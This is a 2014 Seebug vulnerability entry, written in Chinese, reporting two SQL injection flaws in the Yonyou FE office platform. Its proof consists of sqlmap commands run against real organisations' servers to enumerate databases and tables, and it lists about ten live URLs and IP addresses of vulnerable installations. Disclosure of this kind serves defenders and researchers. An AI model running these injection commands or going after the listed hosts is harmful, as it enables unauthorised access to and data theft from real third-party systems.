用友FE办公平台通用SQL注入(2个)

2014-09-02T00:00:00
ID SSV:93338
Type seebug
Reporter Root
Modified 2014-09-02T00:00:00

Description

简要描述:

用友FE办公平台通用SQL注入(2个)

详细说明:

SQL注入1 漏洞文件及参数 /witapprovemanage/report/depReimburse.jsp?depid=1 漏洞证明: sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1"

<img src="https://images.seebug.org/upload/201409/0123020057c21f11c441862e0b5db876ef3b3f74.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

sqlmap.py -u "http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1" --dbs

<img src="https://images.seebug.org/upload/201409/01230211a7cddb3697d74d15d6572a04661b3f2e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

SQL注入二: 漏洞及参数 /system/monitorright/monitor_right_add.jsp?id=1 漏洞利用证明 sqlmap.py -u "http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1"

<img src="https://images.seebug.org/upload/201409/012303218fd447f936cc215639171581c5af151e.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

sqlmap.py -u "http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1" --tables -D fe_base5

<img src="https://images.seebug.org/upload/201409/01230332bd7da71cbe8cd1fea932a09f4b2c1703.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">

5个案例: http://oa.shunhengli.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.chnjcdc.com:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://115.29.234.197:8090/witapprovemanage/report/depReimburse.jsp?depid=1 http://119.145.194.122:9090/witapprovemanage/report/depReimburse.jsp?depid=1 http://oa.hzuf.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.shunhengli.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://oa.chnjcdc.com:9090/system/monitorright/monitor_right_add.jsp?id=1 http://115.29.234.197:8090/system/monitorright/monitor_right_add.jsp?id=1 http://119.145.194.122:9090/system/monitorright/monitor_right_add.jsp?id=1

漏洞证明:

<img src="https://images.seebug.org/upload/201409/01230332bd7da71cbe8cd1fea932a09f4b2c1703.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">